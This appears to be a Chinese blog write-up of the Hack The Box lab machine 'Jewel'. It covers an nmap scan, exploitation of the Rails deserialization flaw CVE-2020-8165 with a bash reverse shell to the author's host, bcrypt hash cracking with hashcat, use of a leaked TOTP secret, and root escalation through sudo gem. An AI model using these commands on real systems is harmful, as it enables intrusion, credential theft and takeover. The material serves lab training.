Hack The Box - Jewel 不安全的反序列化

  • laoxinsec

    2022-04-17 18:41:45
  • 数据库开发技术
  • 原创

title: Hack The Box - Jewel 不安全的反序列化 author: World'sEnd layout: true categories: 漏洞专题 tags:

漏洞笔记

Hack The Box - Jewel

Nmap 7.92 scan initiated Sun Apr 10 13:17:04 2022 as: nmap -sV -sC -Pn -T4 -p- -oA nmap.txt 10.10.10.211
Nmap scan report for 10.10.10.211
Host is up (0.17s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
|   256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_  256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open  http    Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-title: 10.10.10.211 Git
|_Requested resource was http://10.10.10.211:8000/gitweb/
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
8080/tcp open  http    nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-title: BL0G!
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
Service Info: Host: jewel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 10 13:20:33 2022 -- 1 IP address (1 host up) scanned in 209.10 seconds

22端口用户名枚举漏洞,先跳过。8000端口Apache httpd 2.4.38,8080端口nginx 1.14.2 (Phusion Passenger 6.0.6),

8000:

8080:

在两个web页面中来回探索,我发现了一个bill(比尔)的用户,这或许是一个潜在的用户名,然后我误打误撞找到了以下页面:

http://10.10.10.211:8000/gitweb/?p=.git;a=commitdiff_plain;h=HEAD

这就足以让我锁定一个CVE漏洞了:

Ruby on Rails 反序列化远程代码执行漏洞,CVE-2020-8165。

但是我在网上并没有找到该漏洞的相关说明,或是一笔带过,或是含糊不清。这便是我搜寻了很多资料最终都只有这一句:

rails < 5.2.4.3、rails < 6.0.3.1 中存在不可信数据漏洞的反序列化,这可能允许攻击者在 MemCacheStore 和 RedisCacheStore 中解组用户提供的对象,从而可能导致 RCE。

很抱歉这次我也无法研究该漏洞究竟为何产生,因为我也不知道。我只找到了如下漏洞利用脚本:

https://github.com/hybryx/CVE-2020-8165/blob/main/exploit.py

账户可以在以下页面注册:

http://10.10.10.211:8080/signup

脚本中我也看不出该漏洞究竟为何,因为它只要求我提供目标ID,我注册的用户口令,目标端口以及要执行的命令。它的利用方法很简单:

python3 exploit.py 10.10.10.211 8080 worldisend@qq.com worldisend "bash -c 'bash -i >& /dev/tcp/10.10.16.9/8989 0>&1'"
nc -lvnp 8989                                     
listening on [any] 8989 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.211] 47642
bash: cannot set terminal process group (792): Inappropriate ioctl for device
bash: no job control in this shell
bill@jewel:~/blog$ whoami
whoami
bill
bill@jewel:~/blog$

就这样,我稀里糊涂就获得了目标的反向shell,没有漏洞原理,没有反序列化注入点。

user.txt:

bill@jewel:/home$ cd bill                                                                                                                                                                   
cd bill                                                                                                                                                                                     
bill@jewel:~$ ls                                                                                                                                                                            
ls                                                                                                                                                                                          
blog                                                                                                                                                                                        
user.txt
bill@jewel:~$ cat user.txt

在备份目录可以看到一堆备份:

bill@jewel:/var/backups$ ls -all
ls -all
total 2468
drwxr-xr-x  2 root root     4096 Apr 10 08:26 .
drwxr-xr-x 12 root root     4096 Aug 27  2020 ..
-rw-r--r--  1 root root    81920 Aug 26  2020 alternatives.tar.0
-rw-r--r--  1 root root    51600 Sep 17  2020 apt.extended_states.0
-rw-r--r--  1 root root     5415 Aug 28  2020 apt.extended_states.1.gz
-rw-r--r--  1 root root     5363 Aug 27  2020 apt.extended_states.2.gz
-rw-r--r--  1 root root      252 Aug 26  2020 dpkg.diversions.0
-rw-r--r--  1 root root      156 Aug 26  2020 dpkg.diversions.1.gz
-rw-r--r--  1 root root      156 Aug 26  2020 dpkg.diversions.2.gz
-rw-r--r--  1 root root      156 Aug 26  2020 dpkg.diversions.3.gz
-rw-r--r--  1 root root      156 Aug 26  2020 dpkg.diversions.4.gz
-rw-r--r--  1 root root      156 Aug 26  2020 dpkg.diversions.5.gz
-rw-r--r--  1 root root      156 Aug 26  2020 dpkg.diversions.6.gz
-rw-r--r--  1 root root      173 Aug 26  2020 dpkg.statoverride.0
-rw-r--r--  1 root root      158 Aug 26  2020 dpkg.statoverride.1.gz
-rw-r--r--  1 root root      158 Aug 26  2020 dpkg.statoverride.2.gz
-rw-r--r--  1 root root      158 Aug 26  2020 dpkg.statoverride.3.gz
-rw-r--r--  1 root root      158 Aug 26  2020 dpkg.statoverride.4.gz
-rw-r--r--  1 root root      158 Aug 26  2020 dpkg.statoverride.5.gz
-rw-r--r--  1 root root      158 Aug 26  2020 dpkg.statoverride.6.gz
-rw-r--r--  1 root root   910140 Feb  8  2021 dpkg.status.0
-rw-r--r--  1 root root   227505 Sep 18  2020 dpkg.status.1.gz
-rw-r--r--  1 root root   227505 Sep 18  2020 dpkg.status.2.gz
-rw-r--r--  1 root root   227505 Sep 18  2020 dpkg.status.3.gz
-rw-r--r--  1 root root   227505 Sep 18  2020 dpkg.status.4.gz
-rw-r--r--  1 root root   226834 Sep 17  2020 dpkg.status.5.gz
-rw-r--r--  1 root root   222736 Aug 28  2020 dpkg.status.6.gz
-rw-r--r--  1 root root     7828 Aug 27  2020 dump_2020-08-27.sql
-rw-------  1 root root      763 Aug 27  2020 group.bak
-rw-------  1 root shadow    637 Aug 27  2020 gshadow.bak
-rw-------  1 root root     1670 Aug 26  2020 passwd.bak
-rw-------  1 root shadow   1059 Aug 28  2020 shadow.bak
bill@jewel:/var/backups$

在dump_2020-08-27.sql中会有两串哈希:

COPY public.users (id, username, email, created_at, updated_at, password_digest) FROM stdin;
2       jennifer        jennifer@mail.htb       2020-08-27 05:44:28.551735      2020-08-27 05:44:28.551735      $2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO
1       bill    bill@mail.htb   2020-08-26 10:24:03.878232      2020-08-27 09:18:11.636483      $2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW

jennifer的哈希并没有碰撞出来,但是bill的哈希我碰撞了出来:

hashcat -m 3200 ./hash2.txt /usr/share/wordlists/rockyou.txt
$2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW:spongebob

我可以尝试一下sudo -l,它会报错:

sudo: no tty present and no askpass program specified

我可以升级一下shell解决这个问题:

python3 -c 'import pty; pty.spawn("/bin/bash")'
bill@jewel:/var$ sudo -l
sudo -l
[sudo] password for bill: spongebob

Verification code:

好吧,看起来它还需要另一种验证,我记得我之前在用户根目录发现过这个:

-r--------  1 bill bill   56 Aug 28  2020 .google_authenticator
bill@jewel:~$ cat .google_authenticator
cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4
" WINDOW_SIZE 17
" TOTP_AUTH
bill@jewel:~$

我觉得它像是在为Google打广告,可以到Google浏览器下载GAuth Authenticator插件。然后输入:

我就会拥有一个类似于QQ安全中心的动态六位验证码,每过十几秒就会刷新一次:

然后我就可以成功的使用sudo了:

bill@jewel:~$ sudo -l
sudo -l
[sudo] password for bill: 

I think ... err ... I think ... I think I'll go home
[sudo] password for bill: 

I feel much better now.
[sudo] password for bill: spongebob

Verification code: 627125

Matching Defaults entries for bill on jewel:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    insults

User bill may run the following commands on jewel:
    (ALL : ALL) /usr/bin/gem
bill@jewel:~$

但是我sudo也只能使用/usr/bin/gem。我从以下网址中获取到了gem的使用信息:

https://gtfobins.github.io/gtfobins/gem/

我可以这样:

sudo /usr/bin/gem open -e "/bin/sh -c /bin/sh" rdoc
bill@jewel:~$ sudo /usr/bin/gem open -e "/bin/sh -c /bin/sh" rdoc                            
sudo /usr/bin/gem open -e "/bin/sh -c /bin/sh" rdoc
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root)

root.txt:

# cat /root/root.txt
cat /root/root.txt


请使用浏览器的分享功能分享到微信等